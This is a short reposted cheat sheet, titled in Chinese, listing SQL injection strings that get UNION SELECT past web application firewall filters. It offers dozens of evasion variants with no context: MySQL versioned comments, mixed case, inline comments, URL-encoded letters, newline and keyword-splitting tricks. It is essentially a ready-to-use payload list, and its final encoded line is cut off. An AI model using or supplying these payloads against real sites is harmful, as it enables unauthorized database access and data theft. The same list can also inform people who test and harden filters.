sql注入绕过union select过滤

#WAF Bypassing Strings: /*!UNiOn*/ /*!SeLEct*/ Union(Select 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000Select*/ +#uNiOn+#sEleCt +#1q uNiOn all#qa #%0AsEleCt /*!UNiOn*/ /*!SeLEct*/ /*!union*/ /*!select*/ +un/**/ion+se/**/lect union+se%0blect /**/union/**%2fselect union#foo*/*bar select#foo %0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ +UnIOn SeleCt %0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +union+select+ %2f%2a*/union%2f%2a /select%2f%2a*/ /**/union/**/select/**/ /**/union/**/select/**%2f union#foo*/*bar select#foo %0A /*!UnIoN*/SeLecT+ ## # # #Union Select by PASS with Url Encoded Method: Union(%53elect) union distinct select union%20distinctRO%57 select union%2053elect %23? uion%20?%23?%0aselect %23?zen? union all#zen #Zen%0Aselect Union %53eLEct union se%6cect union %73elect union%20distinc%74%20%73elect union distinctROW s%65lect

%75no%69n %61ll %73%65l%65%63%7

转自 http://www.cnblogs.com/xishaonian/p/6274586.html